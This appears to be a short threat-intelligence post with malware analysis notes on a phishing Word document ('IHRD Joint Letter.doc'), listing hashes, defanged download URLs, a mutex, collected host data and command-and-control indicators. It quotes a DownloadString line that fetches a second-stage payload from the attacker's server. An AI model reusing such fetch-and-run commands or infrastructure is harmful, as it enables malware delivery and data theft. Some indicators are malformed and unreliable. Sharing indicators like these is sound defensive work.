IHRD Joint Letter.doc https://www.virustotal.com/#/file/d0dc5974fb4256c46980b292391021d80dfd302522da7f30881a139884aa23dc/detection … from http://www.kvtester[.]com/uploads/media/IHRD%20Joint%20Letter.doc DownloadString('http://www.kvtester[.]com/data/admin/ab0.txt') > http://www.kvtester[.]com/data/win/win32.dll https://www.virustotal.com/#/file/e1daf9f2e56f4fa0281000b9c07b87a94ac2836bd45d7dad46291d690b667716/detection … #phishing #malware #infosecpic.twitter.com/hiu5NkAuZ5
Mutex:
CreateMutex (MutexName = "11171909")
Collects:
OS info (GetVersionA)
Local IP (gethostname / inet_atoi)
User (GetComputerName)
Checks if behind NAT / privileges
Connects:
198.44.226[.41
References:
www.dotnetfix[.ns02.biz